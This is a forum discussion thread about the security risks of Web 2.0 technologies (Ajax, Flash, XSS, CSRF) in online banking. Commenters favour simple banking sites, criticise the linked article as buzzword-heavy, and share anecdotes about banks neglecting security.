Web 2.0 Threats and Risks for Financial Services

An anonymous reader writes "Companies are tuning into Web 2.0 but are simultaneously exposing their systems to next generation threats such as Cross site Scripting, Cross Site Request Forgery and Application interconnection issues due to SOA. With regard to security, two dimensions are very critical for financial systems — Identity and Data privacy. Adopting the Web 2.0 framework may involve risks and threats against these two dimensions along with other security concerns. Ajax, Flash (RIA) and Web Services deployment is critical for Web 2.0 applications. Financial services are putting these technologies in place; most without adequate threat assessment exercises."

honestly...

[cosmocain]

...i don't need some flashy looking online-banking. i just want to transfer money from account a to account b, wonder, where my money has gone, etc. sometimes this little sentence just makes sense:

keep it simple. for such ordinary tasks there does not have to be great interaction schemes or whatever comes to your mind. it just has to freaking work. and - it's even more secure the simple way? well, then don't tamper with it.

The real problem

[CastrTroy]

The real problem is outlined right in the blurb. That problem is: "without adequate threat assessment exercises". I don't think any of these technologies are inherently any worse than any other method, but the problem is that they don't understand the technologies well enough, and aren't testing for vulnerabilities. It's just like with PHP. Sure you can code your pages with really insecure SQL injection technologies, but there's solutions like prepared statements that make it a non-issue. What I want to know is, why are all these financial institutions jumping on the Web 2.0 bandwagon before they fully understand what they are doing? From my point of view, web 1.0 is good enough, and I don't see why everyone wants to switch so fast.

Web 2.0 not necessary for banks

[adrenalinerush]

Hmmm... my bank's website is still quite web 1.0, and I don't have any problem with that. I don't really see where the '2.0' technologies would improve my online banking experience enough to outweigh the potential security holes. I foresee my bank sticking with 1.0.

Why is this even being considered?

Re:honestly...

[SatanicPuppy]

With complexity comes insecurity. Nothing makes me happier than an old atm with a limited feature set...You know it's not running windows in the background, you know it doesn't have code interpretation vulnerabilities...It's simple, clean, and elegant.

Likewise the web presence. Whenever I see data change without a page load it creeps me out. It may be sexy looking, but for every piece of flashy 2.0 Ajax, there is a cost in terms of security.

Sad to say though, there are people out there who are so conditioned to the "new is better" mentality that applies to consumer goods, that they think the same applies to computer code. They view a flashy "new" site as being more secure, rather than less secure, because newer is better, right?

Re:honestly...

[goombah99]

You'd think some bank could turn this into a marketing ploy. put up a banner saying "please excuse the sluggishness and old fashion style of our web site, unlike our comeptitors we use a transactional accounting system and everything you see on your screen is generated right on our servers. It's safer even if it isn't sexy. But you don't really want your bank to be sexy do you?".

Now could someone please explain to me what cross site scripting is and why it is so hard to stamp it out.

please buy my security solution ..

[rs232]

Shouldn't security be built into these Web 2.0 application from the ground up and not added on as an afterthought.

Re:The real problem

[NickFitz]

The real problem with TFA becomes apparent at the start of the second page:

RSS feeds exist in Web 2.0 data format.

That sentence alone confirmed what I'd been beginning to suspect by the end of the first paragraph: TFA is a mishmash of ill-informed technobabble penned for the purpose of allowing underqualified CTOs to give the impression that they are fully buzzword-compliant.

Re:please buy my security solution ..

[Opportunist]

Has it ever been that way?

I was there when a certain bank that better remains anonymous (not because of being innocent, but because they got more & better lawyers than me) jumped the train for online business. All the managers saw how much work could be put onto the customers and how much we can save by not having people come in and actually talk to the teller or drop transfer orders in our boxes. They'd do all themselves! And we can charge them for that! Good God, we need that! No matter the cost! Security? Aw heck, ignore that, who'd dare to attack a bank here (Seriously, that was actually the attitude towards it)? And even, what could go wrong? We got https, we got security certificates, our servers are kept tight by the best people money can buy...

The average annual damage for actual physical bank robberies is a tiny fraction by now of what online frauds cause. Especially since you get about 90-95% of the guys that come with a gun to your bank, while 90-95% of those coming online slip past you.

And now everyone's all over security and everyone wants it secure damn right now or else.... But you can't secure something that is inherently insecure. It was designed insecurely, it was created insecurely, it's run insecurely. Yes, the key attack point is the customer, not the bank, but all in all, the damage rests on the banks. Either they pay the damage, or they don't and word gets out, and everyone will stop using online banking. THAT damage, though, would be even higher!

So take my word for it, nobody will give a rat's rear about security until it's too late. Why should it be different this time?